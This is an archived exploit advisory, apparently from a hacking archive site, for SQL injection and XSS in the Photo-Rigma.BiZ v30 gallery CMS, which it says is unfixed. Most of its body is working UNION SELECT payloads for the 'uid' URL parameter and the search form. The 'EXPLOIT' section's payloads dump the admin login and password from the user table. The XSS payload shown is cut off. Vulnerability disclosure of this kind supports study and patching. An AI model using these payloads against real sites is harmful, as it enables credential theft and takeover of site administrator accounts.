AOH :: HP Unsorted R :: VA3272.HTM

REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->



REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->
REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->



------------------------------------------------------------------
REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30--> 
------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://foto.rigma.biz (affected) 
-->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/ 
-->DEMO: http://foto.rigma.biz=09 
-->CATEGORY: CMS / Portals
-->DESCRIPTION: Photo gallery open source project.

-->RELEASED: 2009-04-24

  CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION (SQLi) / XSS
-->AFFECT VERSION: V30
-->Discovered Bug date: 2009-04-24
-->Reported Bug date: 2009-04-24
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| SQL INJECTION  ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||




<<<<<<<<=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA>>>>>>>>
				CONDITION: magic_quotes_gpc=off
<<<<<<<<=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA=BA>>>>>>>>



#######################
#######################
## PROOF OF CONCEPT: ##
#######################
#######################


1.- Get var ::::: "uid":



http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 



2.- Search Post Form ::::: "poisk":



%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#



~~~~~---->>Return: version and database.


###############
###############
##  EXPLOIT: ##
###############
###############


1.-


http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/* 



2.-


%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#



~~~~~---->>Return: login and password for user id one (admin).



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| XSS (SEARCH)   ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||



Search Post Form --> ">



#######################################################################
#######################################################################
##*******************************************************************##
##             ESPECIAL GREETZ TO: Str0ke, JosS, etc   		     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO:  SPANISH H4ck3R COMMUNITY                 ##
##*******************************************************************##
#######################################################################
#######################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.